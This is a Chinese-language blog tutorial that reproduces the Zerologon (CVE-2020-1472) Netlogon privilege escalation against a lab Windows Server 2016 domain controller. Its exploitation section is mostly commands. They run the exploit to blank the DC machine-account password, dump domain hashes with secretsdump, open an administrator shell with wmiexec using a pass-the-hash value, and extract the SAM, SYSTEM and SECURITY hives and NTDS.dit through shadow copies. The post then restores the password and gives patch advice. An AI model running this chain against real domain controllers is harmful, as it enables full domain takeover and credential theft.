（环境搭建+复现）CVE-2020-1472 NetLogon 域内提权漏洞

0x00 简介

Netlogon组件是Windows上一项重要的功能组件，用于用户和机器在域内网络上的认证，以及复制数据库以进行域控备份，还用于维护域成员与域之间、域与域控之间、域DC与跨域DC之间的关系。
Netlogon远程协议是一个可用的在Windows域控制器上的RPC（remote procedure call protocol，远程过程调用协议，允许像调用本地服务一样调用远程服务）接口，用于对域中的用户和其他服务进行身份验证，最常见的是方便用户使用NTLM（NTLAN Manager，问询/应答身份验证协议，telnet的一种验证身份方式）登录服务器协议，让计算机更新其域内的密码。其他机器与域控的Netlogon通讯使用RPC协议MS-NRPC（指定了Netlogon远程协议，基于域的网络上的用户和计算机进行身份验证）。
Netlogon协议不会使用与其他RPC服务相同的身份验证方案，而是使用自定义的加密协议，让客户端（加入域的计算机）和服务器（域管理员）互相证明它们都知道共享的机密（客户端计算机的哈希值密码）。

0x01 漏洞概述

CVE-2020-1472是一个windows域控中严重的远程权限提升漏洞，攻击者通过NetLogon，建立与域控间易受攻击的安全通道时，可利用此漏洞获取域管访问权限。

原理：Netlogon使用的AES认证算法中的vi向量默认为0，导致攻击者可以绕过认证，同时其设置域控密码的远程接口也使用了该函数，导致可以将域控中保存在AD中的管理员password设置为空

0x02 影响版本

Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server, version 1903 (Server Core installation)
Windows Server, version 1909 (Server Core installation)
Windows Server, version 2004 (Server Core installation)

0x03 漏洞利用

环境搭建可参考https://blog.csdn.net/qq_40989258/article/details/114842511搭建Microsoft Exchange Server 2016，此文不表。

前提：安装好最新的Impacket环境，git到本地后执行

sudo pip3 install .

环境介绍：域控IP：192.168.0.129

DC_SYSTEM_VERSION ：Microsoft Windows Server 2016 Datacenter
DC_NETBIOS_NAME ：WIN-UNQPITL7FNS
DC_IP_ADDR ：192.168.0.129
DC_DOMAIN  ：EX.COM

1、使用EXP将域控所在机器账户的hash置换成空密码的hash

python3 cve-2020-1472-exploit.py DC-HOST-NAME DC-IP

2、置空后，再次获取域内凭证信息

secretsdump.py ex.com/WIN-UNQPITL7FNS\$@192.168.0.129 -just-dc -no-pass

可以看到机器账户的密码hash已经变成了空

WIN-UNQPITL7FNS$:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

3、使用wmiexec获取到DC 管理员权限的交互Shell

wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:cffd529ebf8690967820375f7196178e ex.com/administrator@192.168.0.129

4、还原域控机器用户的hash

①在上面的攻击过程中，我们将机器的密码置为空，会导致域控脱域，原因是机器用户在AD中的密码（存储在ntds.dic）与本地注册表里面的不一致。还原域控机器账户的hash，只要将AD中的密码与注册表里面的密码保持一致即可。

vssadmin create shadow /for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\system.hiv
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM C:\sam.hiv
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\ShadowCopy
Ntdsutil "activate instance ntds" Ifm "create full C:\ntdsutil" Quit quit

reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save

②使用reg save命令将注册表里的信息拿回本地，再通过secretdump提取出里面的hash：

secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

③使用工具将原始计算机账户哈希还原，后面的hash可以用上图红框中任意一组

python3 reinstall_original_pw.py WIN-UNQPITL7FNS 192.168.0.129 daa8c396da5b3934be0b992f25edb577

python3 reinstall_original_pw.py WIN-UNQPITL7FNS 192.168.0.129 9c76b204cdd95ae814286ef87eaecab247beb41a763a6536a16de85246ddce3f1148e734d5a27f5fed354cc310e796c4a52b45c2c0f6d0a6ef090ab9c1ae3fc63884b563316e2cdc6503420403a3b340b4e9066afe5235420bc7f19caef1f3209604590832761c1e63f2e4f066e154a12173bf8ea11fead59f33e5cc4e5d190196044d8f18fd793a39e7ac9e2cdfdf9eb22130a7e6b9db85374d8a6eb044e09cbc904dd19cb3021ba56325f7ed6391a42924f795b7f494136da99042fae58d8992c3f18cd403e7cd5a672e2ae24ce44c1067eb36f8f685a73bc3c8e931fbc67e864158ed01aa8ed94dcd11fdd6d168ab

④查看WIN-UNQPITL7FNS$账户的hash，已成功还原，此时想要无密码dump hash，就会报错。

0x04 修复方式

1、下载并安装漏洞官方补丁：Security Update Guide - Microsoft Security Response Center
及时进行Microsoft Windows版本更新并且保持Windows自动更新开启。

Referer:

1、CVE-2020-1472 NetLogon特权提升漏洞 - zw1sh - 博客园

2、https://github.com/risksense/zerologon

3、https://github.com/dirkjanm/CVE-2020-1472

4、https://github.com/SecureAuthCorp/impacket/tree/impacket_0_9_24

（环境搭建+复现）CVE-2020-1472 NetLogon 域内提权漏洞相关推荐

内网渗透：八、CVE-2020-1472 NetLogon 域内提权漏洞（域控密码置空）
简介 2020年8月11号,微软修复了Netlogon 特权提升漏洞,2020年9月11日,安全研究员Secura发布了公告,阐明了漏洞细节,之后相关的EXP也就被构造出来.该漏洞也称为"Z ...
[内网渗透]—NetLogon 域内提权漏洞(CVE-2020-1472)
简介 CVE-2020-1472 是⼀个 windows 域控中严重的远程权限提升漏洞,攻击者通过 NetLogon,建⽴与域控间易受攻击的安全通道时,可利⽤此漏洞获取域管访问权限(将域控中保存在AD ...
CVE-2021-42287、CVE-2021-42278域内提权漏洞
目录影响范围漏洞介绍测试环境漏洞复现使用sam-the-admin.py 2021 年 11 月 9 日,国外研究员在推特上发布了 Active Directory 相关的 CVE,CVE- ...
域内提权之MS14-068
目录漏洞原理漏洞复现目标:普通域成员-->域管理员漏洞利用前提域控没有打MS14-068的补丁(KB3011780) 拿下一台加入域的计算机有这台域内计算机的域用户密码和Sid 漏洞 ...
【安全漏洞】CVE-2021-42287CVE-2021-42278 域内提权
前言网络安全技术学习,承认⾃⼰的弱点不是丑事.只有对原理了然于⼼,才能突破更多的限制.拥有快速学习能力的白帽子,是不能有短板的,有的只能是大量的标准板和几块长板.知识⾯,决定看到的攻击⾯有多⼴:知识 ...
网络攻防｜CVE-2021-42287、CVE-2021-42278域内提权
作者: r0n1n 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责. 0x01 漏洞原理 Microsoft Windows Active Directory 域服务权限提升漏 ...
【内网安全】横向移动域控提权NetLogonADCSPACKDC永恒之蓝
文章目录章节点横向移动-系统漏洞-CVE-2017-0146(永恒之蓝) 影响版本插件检测-横向移动 CS联动MSF-检测&利用横向移动-域控提权-CVE-2014-6324 横向移动 ...
域控批量导入用户_kerberos域用户提权分析
2014年,微软发布了一个紧急补丁,修复了Kerberos域用户提权漏洞(MS14-068),所有的Windows服务器操作系统都受到该漏洞的影响.该漏洞允许攻击者将域内任意用户权限,提升到域管理员级 ...
Linux Privilege Escalation Kernel Exploits | Linux本地内核提权漏洞复现 CVE-2015-1328
Linux Privilege Escalation Kernel Exploits | Linux本地内核提权漏洞复现 CVE-2015-1328 文章目录 Linux Privilege Esca ...

（环境搭建+复现）CVE-2020-1472 NetLogon 域内提权漏洞

（环境搭建+复现）CVE-2020-1472 NetLogon 域内提权漏洞相关推荐

最新文章

热门文章